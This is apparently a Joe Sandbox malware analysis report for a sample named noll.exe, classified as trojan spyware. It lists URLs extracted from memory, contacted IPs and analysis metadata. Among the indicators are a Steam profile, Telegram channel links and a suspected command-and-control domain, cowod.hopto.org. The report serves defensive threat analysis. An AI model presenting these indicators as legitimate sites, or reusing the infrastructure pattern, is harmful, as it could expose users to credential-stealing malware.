https://steamcommunity.com/profiles/76561199780418869/badges	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hoptoref=	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://www.youtube.com	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.org_DEBUG.zip/c	noll.exe	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	noll.exe	false		high
http://cowod.hopto	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
https://s.ytimg.com;	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cowod.=cloudflare	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steam.tv/	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://store.steampowered.com/points/shop/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://sketchfab.com	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/ae5edC	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.ef=	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarog	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://www.google.com/recaptcha/	noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/ae5edj	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://t.me/ae5edm	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&amp	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/w	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/ae5edg	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/publi	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
https://store.steampowered.com/about/	76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/	noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://t.me/	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=	76561199780418869[1].htm.0.dr	false		high
https://web.telegram.org	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://help.steampowered.com/en/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/market/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://store.steampowered.com/news/	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.orglass=	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://store.steampowered.com/subscriber_agreement/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://t.me/F	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199780418869/inventory/	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://steamcommunity.com/discussions/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://store.steampowered.com/stats/	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://medal.tv	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
http://cowod.hopto.flare	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://login.steampowered.com/	noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://t.me/ae5ed&	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.0.dr	false		high
http://cowod.hoptoml	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org/	noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://recaptcha.net	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/	76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4	noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	false		high
http://127.0.0.1:27060	noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=	noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577315
Start date and time:	2024-12-18 11:36:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	noll.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/2@3/2
EGA Information:	Successful, ratio: 100%
